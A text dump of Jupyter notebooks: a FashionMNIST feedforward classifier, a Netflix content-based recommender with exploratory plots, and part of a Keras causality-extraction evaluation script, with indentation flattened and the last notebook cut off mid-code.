# !pip install matplotlib --upgrade --quiet
import torch
import torchvision
import numpy as np
import matplotlib.pyplot as plt
import torch.nn as nn
import torch.nn.functional as F
from torchvision.datasets import FashionMNIST
from torchvision.transforms import ToTensor
from torchvision.utils import make_grid
from torch.utils.data.dataloader import DataLoader
from torch.utils.data import random_split
%matplotlib inline
project_name='fashion-feedforward-minimal'
###Output
_____no_output_____
###Markdown
Preparing the Data
###Code
dataset = FashionMNIST(root='data/', download=True, transform=ToTensor())
test_dataset = FashionMNIST(root='data/', train=False, transform=ToTensor())
val_size = 10000
train_size = len(dataset) - val_size
train_ds, val_ds = random_split(dataset, [train_size, val_size])
len(train_ds), len(val_ds)
batch_size=128
train_loader = DataLoader(train_ds, batch_size, shuffle=True, num_workers=4, pin_memory=True)
val_loader = DataLoader(val_ds, batch_size*2, num_workers=4, pin_memory=True)
test_loader = DataLoader(test_dataset, batch_size*2, num_workers=4, pin_memory=True)
for images, _ in train_loader:
print('images.shape:', images.shape)
plt.figure(figsize=(16,8))
plt.axis('off')
plt.imshow(make_grid(images, nrow=16).permute((1, 2, 0)))
break
###Output
images.shape: torch.Size([128, 1, 28, 28])
###Markdown
Model
###Code
def accuracy(outputs, labels):
_, preds = torch.max(outputs, dim=1)
return torch.tensor(torch.sum(preds == labels).item() / len(preds))
class MnistModel(nn.Module):
"""Feedfoward neural network with 1 hidden layer"""
def __init__(self, in_size, out_size):
super().__init__()
# hidden layer
self.linear1 = nn.Linear(in_size, 16)
# hidden layer 2
self.linear2 = nn.Linear(16, 32)
# output layer
self.linear3 = nn.Linear(32, out_size)
def forward(self, xb):
# Flatten the image tensors
out = xb.view(xb.size(0), -1)
# Get intermediate outputs using hidden layer 1
out = self.linear1(out)
# Apply activation function
out = F.relu(out)
# Get intermediate outputs using hidden layer 2
out = self.linear2(out)
# Apply activation function
out = F.relu(out)
# Get predictions using output layer
out = self.linear3(out)
return out
def training_step(self, batch):
images, labels = batch
out = self(images) # Generate predictions
loss = F.cross_entropy(out, labels) # Calculate loss
return loss
def validation_step(self, batch):
images, labels = batch
out = self(images) # Generate predictions
loss = F.cross_entropy(out, labels) # Calculate loss
acc = accuracy(out, labels) # Calculate accuracy
return {'val_loss': loss, 'val_acc': acc}
def validation_epoch_end(self, outputs):
batch_losses = [x['val_loss'] for x in outputs]
epoch_loss = torch.stack(batch_losses).mean() # Combine losses
batch_accs = [x['val_acc'] for x in outputs]
epoch_acc = torch.stack(batch_accs).mean() # Combine accuracies
return {'val_loss': epoch_loss.item(), 'val_acc': epoch_acc.item()}
def epoch_end(self, epoch, result):
print("Epoch [{}], val_loss: {:.4f}, val_acc: {:.4f}".format(epoch, result['val_loss'], result['val_acc']))
###Output
_____no_output_____
###Markdown
Using a GPU
###Code
torch.cuda.is_available()
def get_default_device():
"""Pick GPU if available, else CPU"""
if torch.cuda.is_available():
return torch.device('cuda')
else:
return torch.device('cpu')
device = get_default_device()
device
def to_device(data, device):
"""Move tensor(s) to chosen device"""
if isinstance(data, (list,tuple)):
return [to_device(x, device) for x in data]
return data.to(device, non_blocking=True)
class DeviceDataLoader():
"""Wrap a dataloader to move data to a device"""
def __init__(self, dl, device):
self.dl = dl
self.device = device
def __iter__(self):
"""Yield a batch of data after moving it to device"""
for b in self.dl:
yield to_device(b, self.device)
def __len__(self):
"""Number of batches"""
return len(self.dl)
train_loader = DeviceDataLoader(train_loader, device)
val_loader = DeviceDataLoader(val_loader, device)
test_loader = DeviceDataLoader(test_loader, device)
###Output
_____no_output_____
###Markdown
Training the model
###Code
def evaluate(model, val_loader):
outputs = [model.validation_step(batch) for batch in val_loader]
return model.validation_epoch_end(outputs)
def fit(epochs, lr, model, train_loader, val_loader, opt_func=torch.optim.SGD):
history = []
optimizer = opt_func(model.parameters(), lr)
for epoch in range(epochs):
# Training Phase
for batch in train_loader:
loss = model.training_step(batch)
loss.backward()
optimizer.step()
optimizer.zero_grad()
# Validation phase
result = evaluate(model, val_loader)
model.epoch_end(epoch, result)
history.append(result)
return history
input_size = 784
num_classes = 10
model = MnistModel(input_size, out_size=num_classes)
to_device(model, device)
history = [evaluate(model, val_loader)]
history
history += fit(5, 0.5, model, train_loader, val_loader)
history += fit(5, 0.1, model, train_loader, val_loader)
losses = [x['val_loss'] for x in history]
plt.plot(losses, '-x')
plt.xlabel('epoch')
plt.ylabel('loss')
plt.title('Loss vs. No. of epochs');
accuracies = [x['val_acc'] for x in history]
plt.plot(accuracies, '-x')
plt.xlabel('epoch')
plt.ylabel('accuracy')
plt.title('Accuracy vs. No. of epochs');
###Output
_____no_output_____
###Markdown
Prediction on Samples
###Code
def predict_image(img, model):
xb = to_device(img.unsqueeze(0), device)
yb = model(xb)
_, preds = torch.max(yb, dim=1)
return preds[0].item()
img, label = test_dataset[0]
plt.imshow(img[0], cmap='gray')
print('Label:', dataset.classes[label], ', Predicted:', dataset.classes[predict_image(img, model)])
evaluate(model, test_loader)
###Output
_____no_output_____
###Markdown
Save and upload
###Code
saved_weights_fname='fashion-feedforward.pth'
torch.save(model.state_dict(), saved_weights_fname)
!pip install jovian --upgrade --quiet
import jovian
jovian.commit(project=project_name, environment=None, outputs=[saved_weights_fname])
###Output
_____no_output_____ |
netflix-recommender-and-eda.ipynb | ###Markdown
**Welcome to our first Kernel** Please Vote If you like our Kernel and share your Feedback ** Netflix Recommender, Netflix Exploratory Data Analysis **  Netflix, Inc. is an American over-the-top content platform and production company headquartered in Los Gatos, California. Netflix was founded in 1997 by Reed Hastings and Marc Randolph in Scotts Valley, California. **The company's primary business is a subscription-based streaming service offering online streaming from a library of films and television series, including those produced in-house.**
###Code
# This Python 3 environment comes with many helpful analytics libraries installed
# It is defined by the kaggle/python Docker image: https://github.com/kaggle/docker-python
# For example, here's several helpful packages to load
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
# Input data files are available in the read-only "../input/" directory
# For example, running this (by clicking run or pressing Shift+Enter) will list all files under the input directory
import os
for dirname, _, filenames in os.walk('/kaggle/input'):
for filename in filenames:
print(os.path.join(dirname, filename))
# You can write up to 20GB to the current directory (/kaggle/working/) that gets preserved as output when you create a version using "Save & Run All"
# You can also write temporary files to /kaggle/temp/, but they won't be saved outside of the current session
import pandas as pd #pandas to load datasets
import numpy as np #numpy for linear algebra
import matplotlib.pyplot as plt #matplotlib for making plots
import seaborn as sns #seaborn for making plots
###Output
_____no_output_____
###Markdown
** NETFLIX RECOMMENDER SYSTEM ** **Recommender systems try to automate aspects of a completely different information discovery model where people try to find other people with similar tastes and then ask them to suggest new things.**
###Code
netflix_dataset = pd.read_csv("../input/netflix-shows/netflix_titles.csv")
netflix_dataset.head()
netflix_dataset.count()
###Output
_____no_output_____
###Markdown
**Content-Based Recommendation System** Content-Based Filtering **A content-based recommender works with data that the user provides, either explicitly (rating) or implicitly (clicking on a link). Based on that data, a user profile is generated, which is then used to make suggestions to the user.** **Filling NaN values with empty String ' '**
###Code
fill_netflix_dataset = netflix_dataset.fillna(' ')
fill_netflix_dataset.head()
###Output
_____no_output_____
###Markdown
**Term Frequency (TF) and Inverse Document Frequency (IDF)** **Term Frequency** measures how frequently a term occurs in a document. Since documents differ in length, a term may appear many more times in long documents than in short ones. Thus, the term frequency is often divided by the document length (i.e. the total number of terms in the document) as a way of normalization:**TF(t) = (Number of times term t appears in a document) / (Total number of terms in the document)****Inverse Document Frequency** measures how important a term is. While computing TF, all terms are considered equally important. However, certain terms, such as "is", "of", and "that", may appear many times but carry little information. Thus we need to weigh down the frequent terms while scaling up the rare ones, by computing the following:**IDF(t) = log_e(Total number of documents / Number of documents with term t in it)****TF-IDF** is useful because common words drown out informative ones. Suppose we search for "the fundamentals of Data Science" on Google: "the" will certainly occur more frequently than "Data Science", but from the search query's point of view the relative importance of "Data Science" is much higher than that of "the".
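As a quick sanity check with made-up numbers (not computed from this dataset), the two factors combine like this:
```python
import math

tf = 3 / 100                 # the term appears 3 times in a 100-word description
idf = math.log(6234 / 62)    # assume it occurs in 62 of the 6,234 descriptions
print(round(tf * idf, 3))    # ~0.138
```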
###Code
from sklearn.feature_extraction.text import TfidfVectorizer
#Removing stop words
tf_idf = TfidfVectorizer(stop_words='english')
#Constructing TF-IDF matrix by transforming and fitting the data
tf_idf_matrix = tf_idf.fit_transform(fill_netflix_dataset['description'])
# shape of tf_idf_matrix
tf_idf_matrix.shape
###Output
_____no_output_____
###Markdown
16151 words describing 6234 movies in the Netflix dataset **Cosine Similarity**Cosine Similarity is used to calculate the numeric value that denotes the similarity between the two movies.Now, we have used the TF-IDF Vectorizer, calculating the Dot product will directly give us the Cosine Similarity Score. Therefore, we will use **sklearn's linear_kernel** instead of cosine similarity since it calculate it much faster.
###Code
from sklearn.metrics.pairwise import linear_kernel
# calculating the Cosine Similarity Score
cosine_sim_score = linear_kernel(tf_idf_matrix, tf_idf_matrix)
cosine_sim_score[0]
###Output
_____no_output_____
###Markdown
Now, we have a cosine similarity score matrix for all the movies in our Dataset.
###Code
netflix_index = netflix_dataset.index
titles = netflix_dataset['title']
indices = pd.Series(netflix_index, index = titles).drop_duplicates()
def get_recommendations(title, cosine_sim = cosine_sim_score):
idx = indices[title]
    # Get the pairwise similarity scores of all movies with that movie
    sim_scores = list(enumerate(cosine_sim[idx]))
# Sort the movies based on the similarity scores
sim_scores = sorted(sim_scores, key = lambda x: x[1], reverse = True)
# Get the scores of the 10 most similar movies
sim_scores = sim_scores[1:11]
# Get the Movie indices
movie_indices = [i[0] for i in sim_scores]
# Return the top 10 Similar movies
return netflix_dataset['title'].iloc[movie_indices]
get_recommendations('Mortel')
get_recommendations('PK')
get_recommendations('Friends')
###Output
_____no_output_____
###Markdown
The model performs reasonably, but the recommendations are not very accurate. They are of limited use because we don't take into consideration very important features such as the title, cast, director and genres (listed_in), which determine the rating and the popularity of a movie.Therefore, we are going to use more suggestive features than the description alone.In the next cells, we will build a more sophisticated recommender system that takes title, description, listed_in, cast, and director into consideration.
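Concretely, for every title we will build a single lower-cased, whitespace-stripped 'soup' string that concatenates the title, director, cast, genres (listed_in) and description, and then compare these strings with simple token counts (`CountVectorizer`) instead of TF-IDF.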
###Code
fill_netflix_dataset.head(2)
def clean_data(x):
return str.lower(x.replace(' ', ''))
###Output
_____no_output_____
###Markdown
Identifying features on which the model is to be filtered
###Code
features = ['title', 'director', 'cast', 'listed_in', 'description']
fill_netflix_dataset = fill_netflix_dataset[features]
for feature in features:
fill_netflix_dataset[feature] = fill_netflix_dataset[feature].apply(clean_data)
fill_netflix_dataset.head(2)
def create_soup(x):
return x['title'] + ' ' + x['director'] + ' ' + x['cast'] + ' ' + x['listed_in'] +' ' + x['description']
fill_netflix_dataset['soup'] = fill_netflix_dataset.apply(create_soup, axis = 1)
###Output
_____no_output_____
###Markdown
Now, we are going to create an updated version of the recommender function, similar to the previous one
###Code
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.metrics.pairwise import cosine_similarity
count = CountVectorizer(stop_words='english')
count_matrix = count.fit_transform(fill_netflix_dataset['soup'])
cosine_sim_score2 = cosine_similarity(count_matrix, count_matrix)
fill_netflix_dataset = fill_netflix_dataset.reset_index()
indices = pd.Series(fill_netflix_dataset.index, index = fill_netflix_dataset['title'])
def updated_recommendations(title, cosine_sim = cosine_sim_score2):
title = title.replace(' ', '').lower()
idx = indices[title]
    # Get the pairwise similarity scores of all movies with that movie
sim_scores = list(enumerate(cosine_sim[idx]))
# Sort the movies based on the similarity scores
sim_scores = sorted(sim_scores, key = lambda x: x[1], reverse = True)
# Get the scores of the 10 most similar movies
sim_scores = sim_scores[1:11]
# Get the Movie indices
movie_indices = [i[0] for i in sim_scores]
# Return the top 10 Similar movies
return netflix_dataset['title'].iloc[movie_indices]
updated_recommendations('PK')
updated_recommendations('The Hook Up Plan')
updated_recommendations('Kiss me first')
updated_recommendations('Friends')
###Output
_____no_output_____
###Markdown
** Analyzing the Dataset through Various Plots ** **Which content is more available on NETFLIX?** MOVIES or TV-SHOWS
###Code
# creating Countplot from Seaborn to show max available content in NETFLIX
sns.set_style('dark')
ax = plt.subplots(figsize = (6, 6))
plt.title('Countplot for Netflix Movies and TV-Shows', fontweight='bold')
ax = sns.countplot(x = 'type', data=netflix_dataset, palette='Set1')
###Output
_____no_output_____
###Markdown
Hence, this plot shows that NETFLIX has more **MOVIE** content than TV-SHOWS. **Which month is a better option to release new content in 2020?** This mainly depends on the distributor's focus and promotion strategy, but it also depends on the number of new titles added/released in a month. If less new content is added in a month, each title competes with fewer new releases and reaches a larger share of the audience, which increases its chances of success.**Hence, releasing in a month with little or no other new content should help a title be more successful.**
###Code
# Creating a heatmap to find the months with the fewest new releases
# Fetch the month and year values from the dataset to plot the heatmap
# The month is available in the 'date_added' column (format 'Month day, Year')
# To extract the month and year we split the 'date_added' column, so we first take that column out of the dataset
net_date = netflix_dataset[['date_added']].dropna()
net_date['Year'] = net_date.date_added.apply(lambda y : y.split(' ')[-1])
net_date['Month'] = net_date.date_added.apply(lambda y : y.split(' ')[0])
month_order = ['January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'November', 'December']
df = net_date.groupby('Year')['Month'].value_counts().unstack().fillna(0)[month_order].T
ax = plt.subplots(figsize = (15, 6), dpi=100)
ax = sns.heatmap(df, cmap="YlGnBu", linewidths=.1)
###Output
_____no_output_____
###Markdown
Judging by the 2019 pattern, August and September may be the best months to launch new content in 2020. **In which Year were the most Movies and TV-Shows released?**
###Code
ax = plt.subplots(figsize = (10, 8))
sns.set_style('dark')
plt.title('Netflix Movie and TV-Shows Releasing', fontweight='bold', fontsize=20)
ax = sns.countplot(y = 'release_year', data = netflix_dataset, order = netflix_dataset['release_year'].value_counts().index[0:15], palette='Set2')
###Output
_____no_output_____
###Markdown
This visualization shows that 2018 is the year with the most releases on Netflix. **Dividing Netflix Dataset into two parts: Movies and TV-Shows**
###Code
netflix_movies = netflix_dataset[netflix_dataset['type'] == 'Movie']
netflix_movies.head()
netflix_tvshows = netflix_dataset[netflix_dataset['type'] == 'TV Show']
netflix_tvshows.head()
###Output
_____no_output_____
###Markdown
**Movies and TV-Shows rating Analysis**
###Code
ax = plt.subplots(figsize = (10, 8))
sns.set_style('dark')
plt.title('Netflix Movie Rating', fontweight='bold', fontsize=20)
ax = sns.countplot(x = 'rating', data = netflix_movies, palette = 'Set2', order = netflix_movies['rating'].value_counts().index[0:15])
ax = plt.subplots(figsize = (10, 8))
sns.set_style('dark')
plt.title('Netflix TV-Shows Rating', fontweight = 'bold', fontsize=20)
ax = sns.countplot(x = 'rating', data = netflix_tvshows, palette='Set2', order = netflix_tvshows['rating'].value_counts().index[0:15])
###Output
_____no_output_____
###Markdown
The most common rating for both Movies and TV Shows is 'TV-MA', which, according to the TV Parental Guidelines website, means “This program is specifically designed to be viewed by adults and therefore may be unsuitable for children under 17.” **Movies and TV-Shows content creating Countries**
###Code
# More movies content creating countries
countries = {}
netflix_movies['country'] = netflix_movies['country'].fillna('Unknown')
list_countries = list(netflix_movies['country'])
for i in list_countries:
i = list(i.split(','))
    if len(i) == 1:
        if i[0] in list(countries.keys()):
            countries[i[0]] += 1
        else:
            countries[i[0]] = 1
else:
for j in i:
if j in list(countries.keys()):
countries[j] += 1
else:
countries[j] = 1
final_countries = {}
for country, no in countries.items():
country = country.replace(' ','')
if country in list(final_countries.keys()):
final_countries[country] += no
else:
final_countries[country] = no
final_countries = {k : v for k, v in sorted(final_countries.items(), key = lambda item : item[1], reverse = True)}
plt.figure(figsize = (15, 15))
plt.title('Movie Content Creating Countries', fontweight = 'bold', fontsize=15)
y_ver = list(final_countries.keys())
x_hor = list(final_countries.values())
sns.barplot( y = y_ver[0:40], x = x_hor[0:40])
plt.xlabel('Number of titles')
###Output
_____no_output_____
###Markdown
The United States creates the most Movie content.
###Code
# More TV-Shows content creating countries
countries = {}
netflix_tvshows['country'] = netflix_tvshows['country'].fillna('Unknown')
list_countries = list(netflix_tvshows['country'])
for i in list_countries:
i = list(i.split(','))
    if len(i) == 1:
        if i[0] in list(countries.keys()):
            countries[i[0]] += 1
        else:
            countries[i[0]] = 1
else:
for j in i:
if j in list(countries.keys()):
countries[j] += 1
else:
countries[j] = 1
final_countries = {}
for country, no in countries.items():
country = country.replace(' ','')
if country in list(final_countries.keys()):
final_countries[country] += no
else:
final_countries[country] = no
final_countries = {k : v for k, v in sorted(final_countries.items(), key = lambda item : item[1], reverse = True)}
plt.figure(figsize = (15, 15))
plt.title('TV-Shows Content Creating Countries', fontweight = 'bold', fontsize=15)
y_ver = list(final_countries.keys())
x_hor = list(final_countries.values())
sns.barplot( y = y_ver[0:40], x = x_hor[0:40])
plt.xlabel('Number of titles')
###Output
_____no_output_____
###Markdown
The United States also creates the most TV-Show content. **Genres WordClouds for Movies and TV-Shows**
###Code
from collections import Counter
from wordcloud import WordCloud, STOPWORDS, ImageColorGenerator
genres = list(netflix_movies['listed_in'])
gen = []
for i in genres:
i = list(i.split(','))
for j in i:
gen.append(j.replace(' ',''))
g = Counter(gen)
text = list(set(gen))
plt.rcParams['figure.figsize'] = (13, 13)
wordcloud = WordCloud(max_font_size = 50, max_words = 100, background_color = 'white').generate(str(text))
plt.title('Movies Genres WordCloud', fontweight = 'bold', fontsize=15)
plt.imshow(wordcloud, interpolation = 'bilinear')
plt.axis('off')
plt.show()
genres = list(netflix_tvshows['listed_in'])
gen = []
for i in genres:
i = list(i.split(','))
for j in i:
gen.append(j.replace(' ',''))
g=Counter(gen)
text = list(set(gen))
wordcloud = WordCloud(max_font_size=50, max_words=100, background_color="white").generate(str(text))
plt.rcParams['figure.figsize'] = (13, 13)
plt.title('TV-Shows Genres WordCloud', fontweight = 'bold', fontsize=15)
plt.imshow(wordcloud, interpolation="bilinear")
plt.axis("off")
plt.show()
###Output
_____no_output_____ |
models/evaluate.ipynb | ###Markdown
Plot Result
###Code
import os
import numpy as np
import matplotlib.pyplot as plt
from IPython.display import Image
import pickle
%matplotlib inline
%config InlineBackend.figure_format = 'retina'
def cv_result(fileName, e):
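    """Average the per-epoch scores stored in the last entry of each pickled CV-fold log found under fileName."""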
import os
from tqdm import tqdm
filePath, r = [], [0]*e
for i in os.walk(fileName):
if i != [] and i[-1] != []:
filePath.extend(i[-1])
filePath = [fileName+fp for fp in filePath]
for fp in filePath:
cv = pickle.load(open(fp, 'rb'))
for i in range(len(cv[-1])):
r[i] += cv[-1][i]
return [(i[0], i[-1]/len(filePath)) for i in enumerate(r, 1)]
def plot_ctl(file_path, num_epochs=200, show=False, save_path=None):
"""
Plot f1-score for causal triplet labeling
"""
f1 = [i[-1] for i in cv_result(file_path, num_epochs)]
max_f1, epoch = max(f1), list(f1).index(max(f1))+1
epochs = list(range(1, num_epochs+1))
plt.figure(figsize=(10, 8))
plt.plot(epochs, f1, label="F1-Score", color="green", linewidth=1)
plt.xlabel("Epochs")
plt.ylabel("Causal Triplet Labeling")
plt.xticks([i for i in range(1, len(f1), 14)])
plt.grid(True)
plt.legend()
plt.annotate('max: %.3f epoch: %3d' % (max_f1, epoch), xy=(epoch, max_f1-0.01),
xytext=(epoch-40, max_f1-0.05), arrowprops=dict(facecolor='black'))
    if save_path is not None:
        plt.savefig(save_path, dpi=666)
    if show:
        plt.show()
def plot_loss(file_path, num_epochs=200, show=False, save_path=None):
"""
Plot Loss
"""
    log = np.load(open(file_path, 'rb'), allow_pickle=True)
plt.figure(figsize=(10, 8))
loss, val_loss = sum([i['loss'] for i in log], []), sum(
[i['val_loss'] for i in log], [])
min_loss, min_val_loss = min(loss), min(val_loss)
loss_epoch, val_loss_epoch = list(loss).index(
min(loss))+1, list(val_loss).index(min(val_loss))+1
epochs = list(range(1, num_epochs+1))
plt.plot(epochs, val_loss, label="val_loss", color="red", linewidth=1)
plt.plot(epochs, loss, label="train_loss", color="green", linewidth=1)
plt.xlabel("Epochs")
plt.ylabel("Loss")
plt.xticks([i for i in range(1, len(loss), 16)])
plt.grid(True)
plt.annotate('min: %.3f epoch: %3d' % (min_loss, loss_epoch), xy=(loss_epoch, min_loss+0.1),
xytext=(loss_epoch-40, min_loss+2), arrowprops=dict(facecolor='black', shrink=0.05))
plt.annotate('min: %.3f epoch: %3d' % (min_val_loss, val_loss_epoch), xy=(val_loss_epoch, min_val_loss+0.1),
xytext=(val_loss_epoch-40, min_val_loss+2), arrowprops=dict(facecolor='black', shrink=0.05))
plt.legend()
    if save_path is not None:
        plt.savefig(save_path, dpi=666)
    if show:
        plt.show()
# plot_ctl('your path to cv log')
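# Similarly for the loss curves (path is a placeholder for wherever the training run wrote
# its pickled loss log; adjust to your own layout):
# plot_loss('your path to loss log', num_epochs=200, save_path='loss.png')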
###Output
_____no_output_____
###Markdown
Evaluate Build Model
###Code
# -*- coding: utf-8 -*-
'''
Author: Zhaoning Li
'''
import keras
import numpy as np
import os
import random as rn
import tensorflow as tf
from keras import backend as K
import pickle
from keras.utils import to_categorical
import h5py
from keras.layers import *
import math
from MHSA import MultiHeadSelfAttention
from ChainCRF import ChainCRF
from keras.models import Model
from keras import optimizers
from keras.callbacks import *
from tag2triplet import *
from sklearn.model_selection import train_test_split
import matplotlib.pyplot as plt
import argparse
MAX_WLEN = 58
MAX_CLEN = 23
VOCAB_SIZE = 15539
CHAR_SIZE = 69
EXTVEC_DIM = 300
FLAIR_DIM = 4096
CHAR_DIM = 30
NUM_CHAR_CNN_FILTER = 30
CHAR_CNN_KERNEL_SIZE = 3
CHAR_LSTM_SIZE = 25
NUM_ID_CNN_FILTER = 300
ID_CNN_KERNEL_SIZE = 3
DILATION_RATE = (1, 2, 4, 1)
NUM_CLASS = 7
class MaskConv1D(Conv1D):
def __init__(self, **kwargs):
super(MaskConv1D, self).__init__(**kwargs)
self.supports_masking = True
def compute_mask(self, inputs, mask=None):
return mask
def call(self, inputs, mask=None):
if mask is not None:
mask = K.cast(mask, K.floatx())
inputs *= K.expand_dims(mask, axis=-1)
return super(MaskConv1D, self).call(inputs)
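# Note: keras' Conv1D ignores masks by default; MaskConv1D propagates the incoming mask
# unchanged and zeroes out masked timesteps before the convolution so that padded
# positions do not contribute to neighbouring outputs.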
class DataGenerator(keras.utils.Sequence):
def __init__(self, list_IDs, x, x_flair, x_char, y, batch_size, classifier, pred=False):
self.list_IDs = list_IDs
self.x = x
self.x_flair = x_flair
self.x_char = x_char
self.y = y
self.batch_size = batch_size
self.classifier = classifier
self.pred = pred
def __len__(self):
return int(np.ceil(len(self.list_IDs) / self.batch_size))
def __getitem__(self, index):
list_IDs_temp = self.list_IDs[index *
self.batch_size:(index+1)*self.batch_size]
return self.__data_generation(list_IDs_temp)
def __data_generation(self, list_IDs_temp):
x = []
if self.pred:
maxlen = MAX_WLEN
else:
maxlen = max([len(np.where(self.x[ID] != 0)[0])
for ID in list_IDs_temp])
x.append(np.zeros((self.batch_size, maxlen)))
for i, ID in enumerate(list_IDs_temp):
x[0][i] = self.x[ID][:maxlen]
if self.x_flair != None:
x_flair = np.zeros((self.batch_size, maxlen, FLAIR_DIM))
for i, ID in enumerate(list_IDs_temp):
x_flair[i] = self.x_flair[ID][:maxlen]
x.append(x_flair)
if self.x_char != None:
if self.pred:
maxlen_c = MAX_CLEN
else:
                maxlen_c = max([len(np.where(self.x_char[ID][_] != 0)[0]) for _ in range(maxlen) for ID in list_IDs_temp])
x_char = np.zeros((self.batch_size, maxlen, maxlen_c))
for i, ID in enumerate(list_IDs_temp):
x_char[i] = self.x_char[ID][:maxlen][:, :maxlen_c]
x.append(x_char)
if self.pred:
return x
y = np.zeros((self.batch_size, maxlen, 1))
for i, ID in enumerate(list_IDs_temp):
y[i] = self.y[ID][:maxlen]
return x, y
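# Note: each batch is padded only to the longest sentence (and, for the char input, the
# longest word) within that batch; at prediction time (pred=True) fixed MAX_WLEN / MAX_CLEN
# padding is used instead so that predictions can be stacked across batches.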
class Data:
def __init__(self, args):
self.word2index, self.index2word = pickle.load(
open(args.file_path+'index/index_w.pkl', 'rb'))
self.embedding = np.load(
open(args.file_path+'embedding/extvec_embedding.npy', 'rb'))
with h5py.File(args.file_path+'test/test.h5', 'r') as fh:
self.xTest = fh['xTest'][:]
self.yTest = fh['yTest'][:]
self.test_flair, self.test_char = None, None
if args.use_flair:
h5f = h5py.File(args.file_path+'embedding/flair.h5', 'r')
self.test_flair = h5f['xTest_flair']
if args.char_emb != None:
h5f_te = h5py.File(args.file_path+'test/test.h5', 'r')
self.test_char = h5f_te['xTest_c']
y_true = self.yTest.reshape(self.yTest.shape[0], MAX_WLEN)
self.y_true_idx = [final_result(y_true[i], [
self.index2word[w] for w in self.xTest[i] if w != 0]) for i in range(len(y_true))]
self.ap = sum([len(i) for i in self.y_true_idx if i != 0])
class Evaluate(Callback):
def __init__(self,
args,
data,
x,
x_g,
y_true_idx,
ap,
save_path=None):
self.pre = []
self.rec = []
self.f1 = []
self.best_f1 = 0.
self.x = x
self.x_g = x_g
self.y_true_idx = y_true_idx
self.ap = ap
self.save_path = save_path
def on_epoch_end(self, epoch, logs=None):
if args.objective == 'cv':
y_pred = np.argmax(self.model.predict_generator(self.x_g), axis=-1)[:len(self.x)]
y_pred_idx = [final_result(
y_pred[i], [data.index2word[w] for w in self.x[i] if w != 0]) for i in range(len(y_pred))]
pp = sum([len(i) for i in y_pred_idx if i != 0])
tp = 0
for i in range(len(self.y_true_idx)):
if self.y_true_idx[i] != 0 and y_pred_idx[i] != 0:
for m in self.y_true_idx[i]:
y_true_cause = [data.index2word[self.x[i][idx]]
for idx in m[0]]
y_true_effect = [data.index2word[self.x[i][idx]]
for idx in m[-1]]
for n in y_pred_idx[i]:
y_pred_cause = [data.index2word[self.x[i][idx]]
for idx in n[0] if self.x[i][idx] != 0]
y_pred_effect = [data.index2word[self.x[i][idx]]
for idx in n[-1] if self.x[i][idx] != 0]
if y_true_cause == y_pred_cause and y_true_effect == y_pred_effect:
tp += 1
pre = tp / float(pp) if pp != 0 else 0
rec = tp / float(self.ap) if self.ap != 0 else 0
f1 = 2 * pre * rec / float(pre + rec) if (pre + rec) != 0 else 0
self.pre.append(pre)
self.rec.append(rec)
self.f1.append(f1)
if f1 > self.best_f1:
self.best_f1 = f1
print(' - val_precision: %.4f - val_recall: %.4f - val_f1_score: %.4f - best_f1_score: %.4f' %
(pre, rec, f1, self.best_f1))
if epoch + 1 == args.num_epochs:
isExists = os.path.exists(self.save_path+'/cv/'+str(args.seed))
if not isExists:
os.makedirs(self.save_path+'/cv/'+str(args.seed))
with open(self.save_path+'/cv/'+str(args.seed)+'/'+str(args.k_fold)+'.pkl', 'wb') as fp:
pickle.dump((self.pre, self.rec, self.f1), fp, -1)
if args.objective == 'test':
if epoch + 1 > 0:
isExists = os.path.exists(self.save_path+'/test')
if not isExists:
os.makedirs(self.save_path+'/test')
self.model.save(filepath=self.save_path+'/test/'+str(args.seed) + '_{' +
str(epoch + 1) + '}' + '.hdf5')
class CausalityExtractor:
def __init__(self, args):
self.reproducibility()
self.kernel_initializer = keras.initializers.glorot_uniform(
seed=args.seed)
self.recurrent_initializer = keras.initializers.Orthogonal(
seed=args.seed)
self.lr = args.learning_rate
self.save_path = 'logs/FLAIR-'+str(args.use_flair)+'_CHAR-'+str(args.char_emb) + \
'_'+args.backbone.upper()+'_1-512' + \
'_MHSA-'+str(args.use_att)+'_' + args.classifier.upper()
def reproducibility(self):
"""
Ensure that the model can obtain reproducible results
"""
os.environ['PYTHONHASHSEED'] = str(args.seed)
os.environ['CUDA_VISIBLE_DEVICES'] = str(args.cuda_devices)
np.random.seed(args.seed)
rn.seed(args.seed)
session_conf = tf.ConfigProto(
device_count={'CPU': args.cpu_core},
intra_op_parallelism_threads=args.cpu_core,
inter_op_parallelism_threads=args.cpu_core,
gpu_options=tf.GPUOptions(allow_growth=True,
#per_process_gpu_memory_fraction=0.7
),
allow_soft_placement=True)
tf.set_random_seed(args.seed)
sess = tf.Session(graph=tf.get_default_graph(), config=session_conf)
K.set_session(sess)
def conv_block(self, x, dilation_rate=1, use_dropout=True, name='1'):
'''
Utility function to apply conv.
'''
x = MaskConv1D(filters=NUM_ID_CNN_FILTER,
kernel_size=ID_CNN_KERNEL_SIZE,
padding='same',
dilation_rate=dilation_rate,
kernel_initializer=self.kernel_initializer,
name='CONV-'+name)(x)
x = Activation('relu', name='RELU-'+name)(x)
if use_dropout:
x = Dropout(args.dropout_rate, seed=args.seed,
name='DROPOUT-'+name)(x)
return x
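    # Note: the CNN backbone in slm() below chains four of these blocks with dilation
    # rates DILATION_RATE = (1, 2, 4, 1), i.e. a dilated-CNN stack that widens the
    # receptive field without pooling; the final block is applied with use_dropout=False.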
def slm(self, data):
"""
Returns Sequence Labeling Model.
"""
seq = Input(shape=(None,), name='INPUT')
emb = Embedding(VOCAB_SIZE,
EXTVEC_DIM,
weights=[data.embedding],
mask_zero=True,
trainable=False, name='WE')(seq)
input_node = [seq]
if args.use_flair:
flair = Input(shape=(None, FLAIR_DIM), name='FLAIR')
emb = concatenate([emb, flair], axis=-1, name='EMB_FLAIR')
input_node.append(flair)
if args.char_emb != None:
char_embedding = []
for _ in range(CHAR_SIZE):
scale = math.sqrt(3.0 / CHAR_DIM)
char_embedding.append(
np.random.uniform(-scale, scale, CHAR_DIM))
char_embedding[0] = np.zeros(CHAR_DIM)
char_embedding = np.asarray(char_embedding)
char_seq = Input(shape=(None, None), name='CHAR_INPUT')
char_emb = TimeDistributed(
Embedding(CHAR_SIZE,
CHAR_DIM,
weights=[char_embedding],
mask_zero=True,
trainable=True), name='CHAR_EMB')(char_seq)
if args.char_emb == 'lstm':
char_emb = TimeDistributed(Bidirectional(LSTM(CHAR_LSTM_SIZE,
kernel_initializer=self.kernel_initializer,
recurrent_initializer=self.recurrent_initializer,
implementation=2,
